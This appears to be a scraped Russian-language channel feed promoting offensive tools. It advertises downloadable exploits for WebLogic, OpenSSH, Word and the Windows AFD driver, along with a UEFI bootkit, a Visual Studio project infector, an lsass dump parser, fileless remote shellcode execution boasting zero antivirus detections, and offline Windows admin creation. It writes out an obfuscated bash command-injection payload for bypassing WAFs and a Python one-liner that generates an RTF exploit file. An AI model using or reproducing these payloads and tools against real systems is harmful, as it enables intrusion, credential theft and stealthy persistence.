Weblogic-CVE-2023-21839
*
Affected version
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

POC

Usage POC:
java -jar target ip: адрес порта ldap

Ударим ГовноПарсером lsass по приближающимся выходным !
download this shit (вас блин предупреждали)

Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.
Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !
Тем временем:

#СкребемПоКиберСусекам

OpenSSH 9.1 exploit and mass scan
*
Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.
download exploit and mass scan


#ssh #exploit #scanner

bootlicker
Устаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.
*
vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard
*
Download bootlicker

#rootkit #bootkit

TCP Data Transfer Tool
Прикольно конечно в кернелМемори писать гадости\радости всякие.
В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.
Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.

Lazarus-Tactic (APT38)
*
Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).
В общем такой 0day-stealer

**После запуска программа заразит все ваши проекты Visual Studio**

bash injection bypass waf

$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'

Нужно больше жира)))))
Analyzing a Python Malware Part 2

RemoteShellcodeExec
Выполнение шелл-кода из удаленного bin-файла с помощью Winhttp.
Shellcodes are dead, long live fileless shellcodes.
*
Пока что 0/26 detections
download

использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root.

Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎

BurpSuite
*
man\tutor
Вдруг вы забыли

pic of day

8 марта вот вот настанет ! 😊

Поддержим проект ?)

BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82
XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k


#праздник

0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system

#windows #lpe

Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.

OfflineAddAdmin2 (это новая версия)

Видео туториал